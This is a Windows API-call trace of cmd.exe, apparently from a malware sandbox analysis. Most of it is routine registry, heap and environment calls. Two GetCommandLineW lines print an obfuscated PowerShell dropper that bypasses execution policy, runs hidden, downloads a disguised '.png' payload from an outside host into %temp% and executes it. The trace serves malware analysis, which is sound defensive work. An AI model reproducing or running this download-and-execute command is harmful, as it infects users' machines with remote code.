	[0148.405] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fd58 | out: phkResult=0x14fd58*=0x0) returned 0x2
	[0148.405] VirtualQuery (in: lpAddress=0x14fd40, lpBuffer=0x14fcc0, dwLength=0x30 | out: lpBuffer=0x14fcc0*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.405] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fcc0, dwLength=0x30 | out: lpBuffer=0x14fcc0*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.405] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fcc0, dwLength=0x30 | out: lpBuffer=0x14fcc0*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.405] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14fcc0, dwLength=0x30 | out: lpBuffer=0x14fcc0*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.405] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fcc0, dwLength=0x30 | out: lpBuffer=0x14fcc0*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0148.405] GetConsoleOutputCP () returned 0x1b5
	[0148.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0148.405] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0148.405] _get_osfhandle (_FileHandle=1) returned 0x7
	[0148.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0148.406] _get_osfhandle (_FileHandle=1) returned 0x7
	[0148.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0148.406] _get_osfhandle (_FileHandle=1) returned 0x7
	[0148.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0148.406] _get_osfhandle (_FileHandle=0) returned 0x3
	[0148.406] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0148.406] _get_osfhandle (_FileHandle=0) returned 0x3
	[0148.406] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0148.406] GetEnvironmentStringsW () returned 0x2c8f20*
	[0148.406] GetProcessHeap () returned 0x2b0000
	[0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xad4) returned 0x2c9a00
	[0148.407] FreeEnvironmentStringsW (penv=0x2c8f20) returned 1
	[0148.407] GetProcessHeap () returned 0x2b0000
	[0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2c87a0
	[0148.407] GetEnvironmentStringsW () returned 0x2c8f20*
	[0148.407] GetProcessHeap () returned 0x2b0000
	[0148.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xad4) returned 0x2ca4e0
	[0148.407] FreeEnvironmentStringsW (penv=0x2c8f20) returned 1
	[0148.407] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec18 | out: phkResult=0x14ec18*=0x44) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x18, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x1, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x1, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x0, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x40, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x40, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x40, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.407] RegCloseKey (hKey=0x44) returned 0x0
	[0148.407] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec18 | out: phkResult=0x14ec18*=0x44) returned 0x0
	[0148.407] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x40, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x1, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x1, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x0, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x9, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x4, lpData=0x14ec30*=0x9, lpcbData=0x14ec14*=0x4) returned 0x0
	[0148.408] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec10, lpData=0x14ec30, lpcbData=0x14ec14*=0x1000 | out: lpType=0x14ec10*=0x0, lpData=0x14ec30*=0x9, lpcbData=0x14ec14*=0x1000) returned 0x2
	[0148.408] RegCloseKey (hKey=0x44) returned 0x0
	[0148.408] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2ea2
	[0148.408] srand (_Seed=0x5d3b2ea2) 
	[0148.408] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0148.408] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0148.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0148.408] GetProcessHeap () returned 0x2b0000
	[0148.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2c8f20
	[0148.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0148.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0148.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0148.409] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0148.409] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0148.409] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0148.409] GetProcessHeap () returned 0x2b0000
	[0148.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c9a00 | out: hHeap=0x2b0000) returned 1
	[0148.409] GetEnvironmentStringsW () returned 0x2c9140*
	[0148.409] GetProcessHeap () returned 0x2b0000
	[0148.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xaec) returned 0x2cbad0
	[0148.409] FreeEnvironmentStringsW (penv=0x2c9140) returned 1
	[0148.409] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0148.409] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0148.409] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0148.409] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0148.409] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0148.409] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0148.409] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0148.409] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0148.409] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0148.409] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0148.409] GetProcessHeap () returned 0x2b0000
	[0148.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c8d80
	[0148.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fa20 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0148.410] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x14fa20, lpFilePart=0x14fa00 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14fa00*="Documents") returned 0x1b
	[0148.410] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0148.410] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f730 | out: lpFindFileData=0x14f730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x2cc5d0
	[0148.410] FindClose (in: hFindFile=0x2cc5d0 | out: hFindFile=0x2cc5d0) returned 1
	[0148.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x14f730 | out: lpFindFileData=0x14f730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x2cc5d0
	[0148.410] FindClose (in: hFindFile=0x2cc5d0 | out: hFindFile=0x2cc5d0) returned 1
	[0148.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x14f730 | out: lpFindFileData=0x14f730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x2cc5d0
	[0148.410] FindClose (in: hFindFile=0x2cc5d0 | out: hFindFile=0x2cc5d0) returned 1
	[0148.410] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0148.410] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0148.410] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0148.410] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0148.410] GetProcessHeap () returned 0x2b0000
	[0148.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbad0 | out: hHeap=0x2b0000) returned 1
	[0148.410] GetEnvironmentStringsW () returned 0x2cafd0*
	[0148.411] GetProcessHeap () returned 0x2b0000
	[0148.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb2c) returned 0x2cbb10
	[0148.411] FreeEnvironmentStringsW (penv=0x2cafd0) returned 1
	[0148.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0148.411] GetProcessHeap () returned 0x2b0000
	[0148.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8d80 | out: hHeap=0x2b0000) returned 1
	[0148.411] GetProcessHeap () returned 0x2b0000
	[0148.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4016) returned 0x2cc650
	[0148.411] GetProcessHeap () returned 0x2b0000
	[0148.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x260) returned 0x2c9c80
	[0148.411] GetProcessHeap () returned 0x2b0000
	[0148.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc650 | out: hHeap=0x2b0000) returned 1
	[0148.411] GetConsoleOutputCP () returned 0x1b5
	[0148.411] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0148.411] GetUserDefaultLCID () returned 0x409
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fb30, cchData=128 | out: lpLCData="0") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fb30, cchData=128 | out: lpLCData="0") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fb30, cchData=128 | out: lpLCData="1") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0148.412] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0148.412] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0148.413] GetProcessHeap () returned 0x2b0000
	[0148.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20c) returned 0x2c9f60
	[0148.413] GetConsoleTitleW (in: lpConsoleTitle=0x2c9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0148.651] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0148.651] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0148.651] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0148.651] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0148.651] GetProcessHeap () returned 0x2b0000
	[0148.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4012) returned 0x2cc650
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4010) returned 0x2d0670
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2c49a0
	[0148.652] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c49a0 | out: hHeap=0x2b0000) returned 1
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0670 | out: hHeap=0x2b0000) returned 1
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4010) returned 0x2d0670
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2c49a0
	[0148.652] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c49a0 | out: hHeap=0x2b0000) returned 1
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0670 | out: hHeap=0x2b0000) returned 1
	[0148.652] GetProcessHeap () returned 0x2b0000
	[0148.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc650 | out: hHeap=0x2b0000) returned 1
	[0148.653] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0148.653] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0148.653] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0148.653] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0148.653] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0148.653] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0148.677] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0148.677] GetProcessHeap () returned 0x2b0000
	[0148.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2ca180
	[0148.677] GetProcessHeap () returned 0x2b0000
	[0148.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c69a0
	[0148.677] GetProcessHeap () returned 0x2b0000
	[0148.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2c8d80
	[0148.678] GetProcessHeap () returned 0x2b0000
	[0148.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2ca240
	[0148.679] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0148.679] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0148.679] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0148.679] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0148.679] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0148.679] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0148.679] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0148.679] GetProcessHeap () returned 0x2b0000
	[0148.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2ca300
	[0148.679] GetProcessHeap () returned 0x2b0000
	[0148.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c69e0
	[0148.686] SetErrorMode (uMode=0x0) returned 0x0
	[0148.686] SetErrorMode (uMode=0x1) returned 0x0
	[0148.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2cafe0, lpFilePart=0x14f210 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14f210*="Documents") returned 0x1b
	[0148.686] SetErrorMode (uMode=0x0) returned 0x1
	[0148.686] GetProcessHeap () returned 0x2b0000
	[0148.686] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cafd0, Size=0x68) returned 0x2cafd0
	[0148.686] GetProcessHeap () returned 0x2b0000
	[0148.686] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2cafd0) returned 0x68
	[0148.686] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0148.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0148.687] GetProcessHeap () returned 0x2b0000
	[0148.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x170) returned 0x2b1a20
	[0148.687] GetProcessHeap () returned 0x2b0000
	[0148.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2d0) returned 0x2cb050
	[0148.695] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0148.695] GetProcessHeap () returned 0x2b0000
	[0148.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe8) returned 0x2b1ba0
	[0148.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.705] _get_osfhandle (_FileHandle=2) returned 0xb
	[0148.705] GetFileType (hFile=0xb) returned 0x2
	[0148.705] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0148.705] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f3d8 | out: lpMode=0x14f3d8) returned 1
	[0148.705] _get_osfhandle (_FileHandle=2) returned 0xb
	[0148.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14f410 | out: lpConsoleScreenBufferInfo=0x14f410) returned 1
	[0148.705] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0148.707] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
